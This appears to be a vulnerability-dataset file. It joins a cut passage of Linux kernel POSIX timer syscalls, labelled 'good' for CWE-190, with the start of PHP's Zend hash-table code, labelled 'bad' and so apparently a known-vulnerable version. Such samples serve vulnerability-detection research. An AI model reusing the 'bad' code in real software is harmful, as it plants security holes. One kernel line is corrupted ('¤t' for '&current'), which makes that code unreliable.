struct hrtimer *timer = &timr->it.real.timer;
return hrtimer_forward(timer, now, timr->it_interval);
}
/*
* Get the time remaining on a POSIX.1b interval timer. This function
* is ALWAYS called with spin_lock_irq on the timer, thus it must not
* mess with irq.
*
* We have a couple of messes to clean up here. First there is the case
* of a timer that has a requeue pending. These timers should appear to
* be in the timer list with an expiry as if we were to requeue them
* now.
*
* The second issue is the SIGEV_NONE timer which may be active but is
* not really ever put in the timer list (to save system resources).
* This timer may be expired, and if so, we will do it here. Otherwise
* it is the same as a requeue pending timer WRT to what we should
* report.
*/
void common_timer_get(struct k_itimer *timr, struct itimerspec64 *cur_setting)
{
const struct k_clock *kc = timr->kclock;
ktime_t now, remaining, iv;
struct timespec64 ts64;
bool sig_none;
sig_none = timr->it_sigev_notify == SIGEV_NONE;
iv = timr->it_interval;
/* interval timer ? */
if (iv) {
cur_setting->it_interval = ktime_to_timespec64(iv);
} else if (!timr->it_active) {
/*
* SIGEV_NONE oneshot timers are never queued. Check them
* below.
*/
if (!sig_none)
return;
}
/*
* The timespec64 based conversion is suboptimal, but it's not
* worth to implement yet another callback.
*/
kc->clock_get(timr->it_clock, &ts64);
now = timespec64_to_ktime(ts64);
/*
* When a requeue is pending or this is a SIGEV_NONE timer move the
* expiry time forward by intervals, so expiry is > now.
*/
if (iv && (timr->it_requeue_pending & REQUEUE_PENDING || sig_none))
timr->it_overrun += kc->timer_forward(timr, now);
remaining = kc->timer_remaining(timr, now);
/* Return 0 only, when the timer is expired and not pending */
if (remaining <= 0) {
/*
* A single shot SIGEV_NONE timer must return 0, when
* it is expired !
*/
if (!sig_none)
cur_setting->it_value.tv_nsec = 1;
} else {
cur_setting->it_value = ktime_to_timespec64(remaining);
}
}
/* Get the time remaining on a POSIX.1b interval timer. */
static int do_timer_gettime(timer_t timer_id, struct itimerspec64 *setting)
{
struct k_itimer *timr;
const struct k_clock *kc;
unsigned long flags;
int ret = 0;
timr = lock_timer(timer_id, &flags);
if (!timr)
return -EINVAL;
memset(setting, 0, sizeof(*setting));
kc = timr->kclock;
if (WARN_ON_ONCE(!kc || !kc->timer_get))
ret = -EINVAL;
else
kc->timer_get(timr, setting);
unlock_timer(timr, flags);
return ret;
}
/* Get the time remaining on a POSIX.1b interval timer. */
SYSCALL_DEFINE2(timer_gettime, timer_t, timer_id,
struct __kernel_itimerspec __user *, setting)
{
struct itimerspec64 cur_setting;
int ret = do_timer_gettime(timer_id, &cur_setting);
if (!ret) {
if (put_itimerspec64(&cur_setting, setting))
ret = -EFAULT;
}
return ret;
}
#ifdef CONFIG_COMPAT_32BIT_TIME
COMPAT_SYSCALL_DEFINE2(timer_gettime, timer_t, timer_id,
struct compat_itimerspec __user *, setting)
{
struct itimerspec64 cur_setting;
int ret = do_timer_gettime(timer_id, &cur_setting);
if (!ret) {
if (put_compat_itimerspec64(&cur_setting, setting))
ret = -EFAULT;
}
return ret;
}
#endif
/*
* Get the number of overruns of a POSIX.1b interval timer. This is to
* be the overrun of the timer last delivered. At the same time we are
* accumulating overruns on the next timer. The overrun is frozen when
* the signal is delivered, either at the notify time (if the info block
* is not queued) or at the actual delivery time (as we are informed by
* the call back to posixtimer_rearm(). So all we need to do is
* to pick up the frozen overrun.
*/
SYSCALL_DEFINE1(timer_getoverrun, timer_t, timer_id)
{
struct k_itimer *timr;
int overrun;
unsigned long flags;
timr = lock_timer(timer_id, &flags);
if (!timr)
return -EINVAL;
overrun = timer_overrun_to_int(timr, 0);
unlock_timer(timr, flags);
return overrun;
}
static void common_hrtimer_arm(struct k_itimer *timr, ktime_t expires,
bool absolute, bool sigev_none)
{
struct hrtimer *timer = &timr->it.real.timer;
enum hrtimer_mode mode;
mode = absolute ? HRTIMER_MODE_ABS : HRTIMER_MODE_REL;
/*
* Posix magic: Relative CLOCK_REALTIME timers are not affected by
* clock modifications, so they become CLOCK_MONOTONIC based under the
* hood. See hrtimer_init(). Update timr->kclock, so the generic
* functions which use timr->kclock->clock_get() work.
*
* Note: it_clock stays unmodified, because the next timer_set() might
* use ABSTIME, so it needs to switch back.
*/
if (timr->it_clock == CLOCK_REALTIME)
timr->kclock = absolute ? &clock_realtime : &clock_monotonic;
hrtimer_init(&timr->it.real.timer, timr->it_clock, mode);
timr->it.real.timer.function = posix_timer_fn;
if (!absolute)
expires = ktime_add_safe(expires, timer->base->get_time());
hrtimer_set_expires(timer, expires);
if (!sigev_none)
hrtimer_start_expires(timer, HRTIMER_MODE_ABS);
}
static int common_hrtimer_try_to_cancel(struct k_itimer *timr)
{
return hrtimer_try_to_cancel(&timr->it.real.timer);
}
/* Set a POSIX.1b interval timer. */
int common_timer_set(struct k_itimer *timr, int flags,
struct itimerspec64 *new_setting,
struct itimerspec64 *old_setting)
{
const struct k_clock *kc = timr->kclock;
bool sigev_none;
ktime_t expires;
if (old_setting)
common_timer_get(timr, old_setting);
/* Prevent rearming by clearing the interval */
timr->it_interval = 0;
/*
* Careful here. On SMP systems the timer expiry function could be
* active and spinning on timr->it_lock.
*/
if (kc->timer_try_to_cancel(timr) < 0)
return TIMER_RETRY;
timr->it_active = 0;
timr->it_requeue_pending = (timr->it_requeue_pending + 2) &
~REQUEUE_PENDING;
timr->it_overrun_last = 0;
/* Switch off the timer when it_value is zero */
if (!new_setting->it_value.tv_sec && !new_setting->it_value.tv_nsec)
return 0;
timr->it_interval = timespec64_to_ktime(new_setting->it_interval);
expires = timespec64_to_ktime(new_setting->it_value);
sigev_none = timr->it_sigev_notify == SIGEV_NONE;
kc->timer_arm(timr, expires, flags & TIMER_ABSTIME, sigev_none);
timr->it_active = !sigev_none;
return 0;
}
static int do_timer_settime(timer_t timer_id, int flags,
struct itimerspec64 *new_spec64,
struct itimerspec64 *old_spec64)
{
const struct k_clock *kc;
struct k_itimer *timr;
unsigned long flag;
int error = 0;
if (!timespec64_valid(&new_spec64->it_interval) ||
!timespec64_valid(&new_spec64->it_value))
return -EINVAL;
if (old_spec64)
memset(old_spec64, 0, sizeof(*old_spec64));
retry:
timr = lock_timer(timer_id, &flag);
if (!timr)
return -EINVAL;
kc = timr->kclock;
if (WARN_ON_ONCE(!kc || !kc->timer_set))
error = -EINVAL;
else
error = kc->timer_set(timr, flags, new_spec64, old_spec64);
unlock_timer(timr, flag);
if (error == TIMER_RETRY) {
old_spec64 = NULL; // We already got the old time...
goto retry;
}
return error;
}
/* Set a POSIX.1b interval timer */
SYSCALL_DEFINE4(timer_settime, timer_t, timer_id, int, flags,
const struct __kernel_itimerspec __user *, new_setting,
struct __kernel_itimerspec __user *, old_setting)
{
struct itimerspec64 new_spec, old_spec;
struct itimerspec64 *rtn = old_setting ? &old_spec : NULL;
int error = 0;
if (!new_setting)
return -EINVAL;
if (get_itimerspec64(&new_spec, new_setting))
return -EFAULT;
error = do_timer_settime(timer_id, flags, &new_spec, rtn);
if (!error && old_setting) {
if (put_itimerspec64(&old_spec, old_setting))
error = -EFAULT;
}
return error;
}
#ifdef CONFIG_COMPAT_32BIT_TIME
COMPAT_SYSCALL_DEFINE4(timer_settime, timer_t, timer_id, int, flags,
struct compat_itimerspec __user *, new,
struct compat_itimerspec __user *, old)
{
struct itimerspec64 new_spec, old_spec;
struct itimerspec64 *rtn = old ? &old_spec : NULL;
int error = 0;
if (!new)
return -EINVAL;
if (get_compat_itimerspec64(&new_spec, new))
return -EFAULT;
error = do_timer_settime(timer_id, flags, &new_spec, rtn);
if (!error && old) {
if (put_compat_itimerspec64(&old_spec, old))
error = -EFAULT;
}
return error;
}
#endif
int common_timer_del(struct k_itimer *timer)
{
const struct k_clock *kc = timer->kclock;
timer->it_interval = 0;
if (kc->timer_try_to_cancel(timer) < 0)
return TIMER_RETRY;
timer->it_active = 0;
return 0;
}
static inline int timer_delete_hook(struct k_itimer *timer)
{
const struct k_clock *kc = timer->kclock;
if (WARN_ON_ONCE(!kc || !kc->timer_del))
return -EINVAL;
return kc->timer_del(timer);
}
/* Delete a POSIX.1b interval timer. */
SYSCALL_DEFINE1(timer_delete, timer_t, timer_id)
{
struct k_itimer *timer;
unsigned long flags;
retry_delete:
timer = lock_timer(timer_id, &flags);
if (!timer)
return -EINVAL;
if (timer_delete_hook(timer) == TIMER_RETRY) {
unlock_timer(timer, flags);
goto retry_delete;
}
spin_lock(¤t->sighand->siglock);
list_del(&timer->list);
spin_unlock(¤t->sighand->siglock);
/*
* This keeps any tasks waiting on the spin lock from thinking
* they got something (see the lock code above).
*/
timer->it_signal = NULL;
unlock_timer(timer, flags);
release_posix_timer(timer, IT_ID_SET);
return 0;
}
/*
* return timer owned by the process, used by exit_itimers
*/
static void itimer_delete(struct k_itimer *timer)
{
unsigned long flags;
retry_delete:
spin_lock_irqsave(&timer->it_lock, flags);
if (timer_delete_hook(timer) == TIMER_RETRY) {
unlock_timer(timer, flags);
goto retry_delete;
}
list_del(&timer->list);
/*
* This keeps any tasks waiting on the spin lock from thinking
* they got something (see the lock code above).
*/
timer->it_signal = NULL;
unlock_timer(timer, flags);
release_posix_timer(timer, IT_ID_SET);
}
/*
* This is called by do_exit or de_thread, only when there are no more
* references to the shared signal_struct.
*/
void exit_itimers(struct signal_struct *sig)
{
struct k_itimer *tmr;
while (!list_empty(&sig->posix_timers)) {
tmr = list_entry(sig->posix_timers.next, struct k_itimer, list);
itimer_delete(tmr);
}
}
SYSCALL_DEFINE2(clock_settime, const clockid_t, which_clock,
const struct __kernel_timespec __user *, tp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 new_tp;
if (!kc || !kc->clock_set)
return -EINVAL;
if (get_timespec64(&new_tp, tp))
return -EFAULT;
return kc->clock_set(which_clock, &new_tp);
}
SYSCALL_DEFINE2(clock_gettime, const clockid_t, which_clock,
struct __kernel_timespec __user *, tp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 kernel_tp;
int error;
if (!kc)
return -EINVAL;
error = kc->clock_get(which_clock, &kernel_tp);
if (!error && put_timespec64(&kernel_tp, tp))
error = -EFAULT;
return error;
}
SYSCALL_DEFINE2(clock_adjtime, const clockid_t, which_clock,
struct timex __user *, utx)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timex ktx;
int err;
if (!kc)
return -EINVAL;
if (!kc->clock_adj)
return -EOPNOTSUPP;
if (copy_from_user(&ktx, utx, sizeof(ktx)))
return -EFAULT;
err = kc->clock_adj(which_clock, &ktx);
if (err >= 0 && copy_to_user(utx, &ktx, sizeof(ktx)))
return -EFAULT;
return err;
}
SYSCALL_DEFINE2(clock_getres, const clockid_t, which_clock,
struct __kernel_timespec __user *, tp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 rtn_tp;
int error;
if (!kc)
return -EINVAL;
error = kc->clock_getres(which_clock, &rtn_tp);
if (!error && tp && put_timespec64(&rtn_tp, tp))
error = -EFAULT;
return error;
}
#ifdef CONFIG_COMPAT_32BIT_TIME
COMPAT_SYSCALL_DEFINE2(clock_settime, clockid_t, which_clock,
struct compat_timespec __user *, tp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 ts;
if (!kc || !kc->clock_set)
return -EINVAL;
if (compat_get_timespec64(&ts, tp))
return -EFAULT;
return kc->clock_set(which_clock, &ts);
}
COMPAT_SYSCALL_DEFINE2(clock_gettime, clockid_t, which_clock,
struct compat_timespec __user *, tp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 ts;
int err;
if (!kc)
return -EINVAL;
err = kc->clock_get(which_clock, &ts);
if (!err && compat_put_timespec64(&ts, tp))
err = -EFAULT;
return err;
}
#endif
#ifdef CONFIG_COMPAT
COMPAT_SYSCALL_DEFINE2(clock_adjtime, clockid_t, which_clock,
struct compat_timex __user *, utp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timex ktx;
int err;
if (!kc)
return -EINVAL;
if (!kc->clock_adj)
return -EOPNOTSUPP;
err = compat_get_timex(&ktx, utp);
if (err)
return err;
err = kc->clock_adj(which_clock, &ktx);
if (err >= 0)
err = compat_put_timex(utp, &ktx);
return err;
}
#endif
#ifdef CONFIG_COMPAT_32BIT_TIME
COMPAT_SYSCALL_DEFINE2(clock_getres, clockid_t, which_clock,
struct compat_timespec __user *, tp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 ts;
int err;
if (!kc)
return -EINVAL;
err = kc->clock_getres(which_clock, &ts);
if (!err && tp && compat_put_timespec64(&ts, tp))
return -EFAULT;
return err;
}
#endif
/*
* nanosleep for monotonic and realtime clocks
*/
static int common_nsleep(const clockid_t which_clock, int flags,
const struct timespec64 *rqtp)
{
return hrtimer_nanosleep(rqtp, flags & TIMER_ABSTIME ?
HRTIMER_MODE_ABS : HRTIMER_MODE_REL,
which_clock);
}
SYSCALL_DEFINE4(clock_nanosleep, const clockid_t, which_clock, int, flags,
const struct __kernel_timespec __user *, rqtp,
struct __kernel_timespec __user *, rmtp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 t;
if (!kc)
return -EINVAL;
if (!kc->nsleep)
return -ENANOSLEEP_NOTSUP;
if (get_timespec64(&t, rqtp))
return -EFAULT;
if (!timespec64_valid(&t))
return -EINVAL;
if (flags & TIMER_ABSTIME)
rmtp = NULL;
current->restart_block.nanosleep.type = rmtp ? TT_NATIVE : TT_NONE;
current->restart_block.nanosleep.rmtp = rmtp;
return kc->nsleep(which_clock, flags, &t);
}
#ifdef CONFIG_COMPAT_32BIT_TIME
COMPAT_SYSCALL_DEFINE4(clock_nanosleep, clockid_t, which_clock, int, flags,
struct compat_timespec __user *, rqtp,
struct compat_timespec __user *, rmtp)
{
const struct k_clock *kc = clockid_to_kclock(which_clock);
struct timespec64 t;
if (!kc)
return -EINVAL;
if (!kc->nsleep)
return -ENANOSLEEP_NOTSUP;
if (compat_get_timespec64(&t, rqtp))
return -EFAULT;
if (!timespec64_valid(&t))
return -EINVAL;
if (flags & TIMER_ABSTIME)
rmtp = NULL;
current->restart_block.nanosleep.type = rmtp ? TT_COMPAT : TT_NONE;
current->restart_block.nanosleep.compat_rmtp = rmtp;
return kc->nsleep(which_clock, flags, &t);
}
#endif
static const struct k_clock clock_realtime = {
.clock_getres = posix_get_hrtimer_res,
.clock_get = posix_clock_realtime_get,
.clock_set = posix_clock_realtime_set,
.clock_adj = posix_clock_realtime_adj,
.nsleep = common_nsleep,
.timer_create = common_timer_create,
.timer_set = common_timer_set,
.timer_get = common_timer_get,
.timer_del = common_timer_del,
.timer_rearm = common_hrtimer_rearm,
.timer_forward = common_hrtimer_forward,
.timer_remaining = common_hrtimer_remaining,
.timer_try_to_cancel = common_hrtimer_try_to_cancel,
.timer_arm = common_hrtimer_arm,
};
static const struct k_clock clock_monotonic = {
.clock_getres = posix_get_hrtimer_res,
.clock_get = posix_ktime_get_ts,
.nsleep = common_nsleep,
.timer_create = common_timer_create,
.timer_set = common_timer_set,
.timer_get = common_timer_get,
.timer_del = common_timer_del,
.timer_rearm = common_hrtimer_rearm,
.timer_forward = common_hrtimer_forward,
.timer_remaining = common_hrtimer_remaining,
.timer_try_to_cancel = common_hrtimer_try_to_cancel,
.timer_arm = common_hrtimer_arm,
};
static const struct k_clock clock_monotonic_raw = {
.clock_getres = posix_get_hrtimer_res,
.clock_get = posix_get_monotonic_raw,
};
static const struct k_clock clock_realtime_coarse = {
.clock_getres = posix_get_coarse_res,
.clock_get = posix_get_realtime_coarse,
};
static const struct k_clock clock_monotonic_coarse = {
.clock_getres = posix_get_coarse_res,
.clock_get = posix_get_monotonic_coarse,
};
static const struct k_clock clock_tai = {
.clock_getres = posix_get_hrtimer_res,
.clock_get = posix_get_tai,
.nsleep = common_nsleep,
.timer_create = common_timer_create,
.timer_set = common_timer_set,
.timer_get = common_timer_get,
.timer_del = common_timer_del,
.timer_rearm = common_hrtimer_rearm,
.timer_forward = common_hrtimer_forward,
.timer_remaining = common_hrtimer_remaining,
.timer_try_to_cancel = common_hrtimer_try_to_cancel,
.timer_arm = common_hrtimer_arm,
};
static const struct k_clock clock_boottime = {
.clock_getres = posix_get_hrtimer_res,
.clock_get = posix_get_boottime,
.nsleep = common_nsleep,
.timer_create = common_timer_create,
.timer_set = common_timer_set,
.timer_get = common_timer_get,
.timer_del = common_timer_del,
.timer_rearm = common_hrtimer_rearm,
.timer_forward = common_hrtimer_forward,
.timer_remaining = common_hrtimer_remaining,
.timer_try_to_cancel = common_hrtimer_try_to_cancel,
.timer_arm = common_hrtimer_arm,
};
static const struct k_clock * const posix_clocks[] = {
[CLOCK_REALTIME] = &clock_realtime,
[CLOCK_MONOTONIC] = &clock_monotonic,
[CLOCK_PROCESS_CPUTIME_ID] = &clock_process,
[CLOCK_THREAD_CPUTIME_ID] = &clock_thread,
[CLOCK_MONOTONIC_RAW] = &clock_monotonic_raw,
[CLOCK_REALTIME_COARSE] = &clock_realtime_coarse,
[CLOCK_MONOTONIC_COARSE] = &clock_monotonic_coarse,
[CLOCK_BOOTTIME] = &clock_boottime,
[CLOCK_REALTIME_ALARM] = &alarm_clock,
[CLOCK_BOOTTIME_ALARM] = &alarm_clock,
[CLOCK_TAI] = &clock_tai,
};
static const struct k_clock *clockid_to_kclock(const clockid_t id)
{
clockid_t idx = id;
if (id < 0) {
return (id & CLOCKFD_MASK) == CLOCKFD ?
&clock_posix_dynamic : &clock_posix_cpu;
}
if (id >= ARRAY_SIZE(posix_clocks))
return NULL;
return posix_clocks[array_index_nospec(idx, ARRAY_SIZE(posix_clocks))];
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_207_2 |
crossvul-cpp_data_bad_3089_0 | /*
+----------------------------------------------------------------------+
| Zend Engine |
+----------------------------------------------------------------------+
| Copyright (c) 1998-2016 Zend Technologies Ltd. (http://www.zend.com) |
+----------------------------------------------------------------------+
| This source file is subject to version 2.00 of the Zend license, |
| that is bundled with this package in the file LICENSE, and is |
| available through the world-wide-web at the following url: |
| http://www.zend.com/license/2_00.txt. |
| If you did not receive a copy of the Zend license and are unable to |
| obtain it through the world-wide-web, please send a note to |
| license@zend.com so we can mail you a copy immediately. |
+----------------------------------------------------------------------+
| Authors: Andi Gutmans <andi@zend.com> |
| Zeev Suraski <zeev@zend.com> |
| Dmitry Stogov <dmitry@zend.com> |
+----------------------------------------------------------------------+
*/
/* $Id$ */
#include "zend.h"
#include "zend_globals.h"
#include "zend_variables.h"
#define HT_DEBUG 0
#if HT_DEBUG
# define HT_ASSERT(c) ZEND_ASSERT(c)
#else
# define HT_ASSERT(c)
#endif
#define HT_POISONED_PTR ((HashTable *) (intptr_t) -1)
#if ZEND_DEBUG
/*
#define HASH_MASK_CONSISTENCY 0xc0
*/
#define HT_OK 0x00
#define HT_IS_DESTROYING 0x40
#define HT_DESTROYED 0x80
#define HT_CLEANING 0xc0
static void _zend_is_inconsistent(const HashTable *ht, const char *file, int line)
{
if ((ht->u.flags & HASH_MASK_CONSISTENCY) == HT_OK) {
return;
}
switch ((ht->u.flags & HASH_MASK_CONSISTENCY)) {
case HT_IS_DESTROYING:
zend_output_debug_string(1, "%s(%d) : ht=%p is being destroyed", file, line, ht);
break;
case HT_DESTROYED:
zend_output_debug_string(1, "%s(%d) : ht=%p is already destroyed", file, line, ht);
break;
case HT_CLEANING:
zend_output_debug_string(1, "%s(%d) : ht=%p is being cleaned", file, line, ht);
break;
default:
zend_output_debug_string(1, "%s(%d) : ht=%p is inconsistent", file, line, ht);
break;
}
zend_bailout();
}
#define IS_CONSISTENT(a) _zend_is_inconsistent(a, __FILE__, __LINE__);
#define SET_INCONSISTENT(n) do { \
(ht)->u.flags |= n; \
} while (0)
#else
#define IS_CONSISTENT(a)
#define SET_INCONSISTENT(n)
#endif
#define HASH_PROTECT_RECURSION(ht) \
if ((ht)->u.flags & HASH_FLAG_APPLY_PROTECTION) { \
if (((ht)->u.flags & ZEND_HASH_APPLY_COUNT_MASK) >= (3 << 8)) { \
zend_error_noreturn(E_ERROR, "Nesting level too deep - recursive dependency?");\
} \
ZEND_HASH_INC_APPLY_COUNT(ht); \
}
#define HASH_UNPROTECT_RECURSION(ht) \
if ((ht)->u.flags & HASH_FLAG_APPLY_PROTECTION) { \
ZEND_HASH_DEC_APPLY_COUNT(ht); \
}
#define ZEND_HASH_IF_FULL_DO_RESIZE(ht) \
if ((ht)->nNumUsed >= (ht)->nTableSize) { \
zend_hash_do_resize(ht); \
}
static void ZEND_FASTCALL zend_hash_do_resize(HashTable *ht);
static uint32_t zend_always_inline zend_hash_check_size(uint32_t nSize)
{
#if defined(ZEND_WIN32)
unsigned long index;
#endif
/* Use big enough power of 2 */
/* size should be between HT_MIN_SIZE and HT_MAX_SIZE */
if (nSize < HT_MIN_SIZE) {
nSize = HT_MIN_SIZE;
} else if (UNEXPECTED(nSize >= HT_MAX_SIZE)) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", nSize, sizeof(Bucket), sizeof(Bucket));
}
#if defined(ZEND_WIN32)
if (BitScanReverse(&index, nSize - 1)) {
return 0x2 << ((31 - index) ^ 0x1f);
} else {
/* nSize is ensured to be in the valid range, fall back to it
rather than using an undefined bis scan result. */
return nSize;
}
#elif (defined(__GNUC__) || __has_builtin(__builtin_clz)) && defined(PHP_HAVE_BUILTIN_CLZ)
return 0x2 << (__builtin_clz(nSize - 1) ^ 0x1f);
#else
nSize -= 1;
nSize |= (nSize >> 1);
nSize |= (nSize >> 2);
nSize |= (nSize >> 4);
nSize |= (nSize >> 8);
nSize |= (nSize >> 16);
return nSize + 1;
#endif
}
static void zend_always_inline zend_hash_real_init_ex(HashTable *ht, int packed)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
ZEND_ASSERT(!((ht)->u.flags & HASH_FLAG_INITIALIZED));
if (packed) {
HT_SET_DATA_ADDR(ht, pemalloc(HT_SIZE(ht), (ht)->u.flags & HASH_FLAG_PERSISTENT));
(ht)->u.flags |= HASH_FLAG_INITIALIZED | HASH_FLAG_PACKED;
HT_HASH_RESET_PACKED(ht);
} else {
(ht)->nTableMask = -(ht)->nTableSize;
HT_SET_DATA_ADDR(ht, pemalloc(HT_SIZE(ht), (ht)->u.flags & HASH_FLAG_PERSISTENT));
(ht)->u.flags |= HASH_FLAG_INITIALIZED;
if (EXPECTED(ht->nTableMask == -8)) {
Bucket *arData = ht->arData;
HT_HASH_EX(arData, -8) = -1;
HT_HASH_EX(arData, -7) = -1;
HT_HASH_EX(arData, -6) = -1;
HT_HASH_EX(arData, -5) = -1;
HT_HASH_EX(arData, -4) = -1;
HT_HASH_EX(arData, -3) = -1;
HT_HASH_EX(arData, -2) = -1;
HT_HASH_EX(arData, -1) = -1;
} else {
HT_HASH_RESET(ht);
}
}
}
static void zend_always_inline zend_hash_check_init(HashTable *ht, int packed)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (UNEXPECTED(!((ht)->u.flags & HASH_FLAG_INITIALIZED))) {
zend_hash_real_init_ex(ht, packed);
}
}
#define CHECK_INIT(ht, packed) \
zend_hash_check_init(ht, packed)
static const uint32_t uninitialized_bucket[-HT_MIN_MASK] =
{HT_INVALID_IDX, HT_INVALID_IDX};
ZEND_API void ZEND_FASTCALL _zend_hash_init(HashTable *ht, uint32_t nSize, dtor_func_t pDestructor, zend_bool persistent ZEND_FILE_LINE_DC)
{
GC_REFCOUNT(ht) = 1;
GC_TYPE_INFO(ht) = IS_ARRAY;
ht->u.flags = (persistent ? HASH_FLAG_PERSISTENT : 0) | HASH_FLAG_APPLY_PROTECTION | HASH_FLAG_STATIC_KEYS;
ht->nTableSize = zend_hash_check_size(nSize);
ht->nTableMask = HT_MIN_MASK;
HT_SET_DATA_ADDR(ht, &uninitialized_bucket);
ht->nNumUsed = 0;
ht->nNumOfElements = 0;
ht->nInternalPointer = HT_INVALID_IDX;
ht->nNextFreeElement = 0;
ht->pDestructor = pDestructor;
}
static void ZEND_FASTCALL zend_hash_packed_grow(HashTable *ht)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nTableSize >= HT_MAX_SIZE) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", ht->nTableSize * 2, sizeof(Bucket), sizeof(Bucket));
}
HANDLE_BLOCK_INTERRUPTIONS();
ht->nTableSize += ht->nTableSize;
HT_SET_DATA_ADDR(ht, perealloc2(HT_GET_DATA_ADDR(ht), HT_SIZE(ht), HT_USED_SIZE(ht), ht->u.flags & HASH_FLAG_PERSISTENT));
HANDLE_UNBLOCK_INTERRUPTIONS();
}
ZEND_API void ZEND_FASTCALL zend_hash_real_init(HashTable *ht, zend_bool packed)
{
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
zend_hash_real_init_ex(ht, packed);
}
ZEND_API void ZEND_FASTCALL zend_hash_packed_to_hash(HashTable *ht)
{
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HANDLE_BLOCK_INTERRUPTIONS();
ht->u.flags &= ~HASH_FLAG_PACKED;
new_data = pemalloc(HT_SIZE_EX(ht->nTableSize, -ht->nTableSize), (ht)->u.flags & HASH_FLAG_PERSISTENT);
ht->nTableMask = -ht->nTableSize;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, (ht)->u.flags & HASH_FLAG_PERSISTENT);
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
}
ZEND_API void ZEND_FASTCALL zend_hash_to_packed(HashTable *ht)
{
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HANDLE_BLOCK_INTERRUPTIONS();
new_data = pemalloc(HT_SIZE_EX(ht->nTableSize, HT_MIN_MASK), (ht)->u.flags & HASH_FLAG_PERSISTENT);
ht->u.flags |= HASH_FLAG_PACKED | HASH_FLAG_STATIC_KEYS;
ht->nTableMask = HT_MIN_MASK;
HT_SET_DATA_ADDR(ht, new_data);
HT_HASH_RESET_PACKED(ht);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, (ht)->u.flags & HASH_FLAG_PERSISTENT);
HANDLE_UNBLOCK_INTERRUPTIONS();
}
ZEND_API void ZEND_FASTCALL _zend_hash_init_ex(HashTable *ht, uint32_t nSize, dtor_func_t pDestructor, zend_bool persistent, zend_bool bApplyProtection ZEND_FILE_LINE_DC)
{
_zend_hash_init(ht, nSize, pDestructor, persistent ZEND_FILE_LINE_RELAY_CC);
if (!bApplyProtection) {
ht->u.flags &= ~HASH_FLAG_APPLY_PROTECTION;
}
}
ZEND_API void ZEND_FASTCALL zend_hash_extend(HashTable *ht, uint32_t nSize, zend_bool packed)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (nSize == 0) return;
if (UNEXPECTED(!((ht)->u.flags & HASH_FLAG_INITIALIZED))) {
if (nSize > ht->nTableSize) {
ht->nTableSize = zend_hash_check_size(nSize);
}
zend_hash_check_init(ht, packed);
} else {
if (packed) {
ZEND_ASSERT(ht->u.flags & HASH_FLAG_PACKED);
if (nSize > ht->nTableSize) {
HANDLE_BLOCK_INTERRUPTIONS();
ht->nTableSize = zend_hash_check_size(nSize);
HT_SET_DATA_ADDR(ht, perealloc2(HT_GET_DATA_ADDR(ht), HT_SIZE(ht), HT_USED_SIZE(ht), ht->u.flags & HASH_FLAG_PERSISTENT));
HANDLE_UNBLOCK_INTERRUPTIONS();
}
} else {
ZEND_ASSERT(!(ht->u.flags & HASH_FLAG_PACKED));
if (nSize > ht->nTableSize) {
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
nSize = zend_hash_check_size(nSize);
HANDLE_BLOCK_INTERRUPTIONS();
new_data = pemalloc(HT_SIZE_EX(nSize, -nSize), ht->u.flags & HASH_FLAG_PERSISTENT);
ht->nTableSize = nSize;
ht->nTableMask = -ht->nTableSize;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, ht->u.flags & HASH_FLAG_PERSISTENT);
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
}
}
}
}
static uint32_t zend_array_recalc_elements(HashTable *ht)
{
zval *val;
uint32_t num = ht->nNumOfElements;
ZEND_HASH_FOREACH_VAL(ht, val) {
if (Z_TYPE_P(val) == IS_UNDEF) continue;
if (Z_TYPE_P(val) == IS_INDIRECT) {
if (UNEXPECTED(Z_TYPE_P(Z_INDIRECT_P(val)) == IS_UNDEF)) {
num--;
}
}
} ZEND_HASH_FOREACH_END();
return num;
}
/* }}} */
ZEND_API uint32_t zend_array_count(HashTable *ht)
{
uint32_t num;
if (UNEXPECTED(ht->u.v.flags & HASH_FLAG_HAS_EMPTY_IND)) {
num = zend_array_recalc_elements(ht);
if (UNEXPECTED(ht->nNumOfElements == num)) {
ht->u.v.flags &= ~HASH_FLAG_HAS_EMPTY_IND;
}
} else if (UNEXPECTED(ht == &EG(symbol_table))) {
num = zend_array_recalc_elements(ht);
} else {
num = zend_hash_num_elements(ht);
}
return num;
}
/* }}} */
ZEND_API void ZEND_FASTCALL zend_hash_set_apply_protection(HashTable *ht, zend_bool bApplyProtection)
{
if (bApplyProtection) {
ht->u.flags |= HASH_FLAG_APPLY_PROTECTION;
} else {
ht->u.flags &= ~HASH_FLAG_APPLY_PROTECTION;
}
}
ZEND_API uint32_t ZEND_FASTCALL zend_hash_iterator_add(HashTable *ht, HashPosition pos)
{
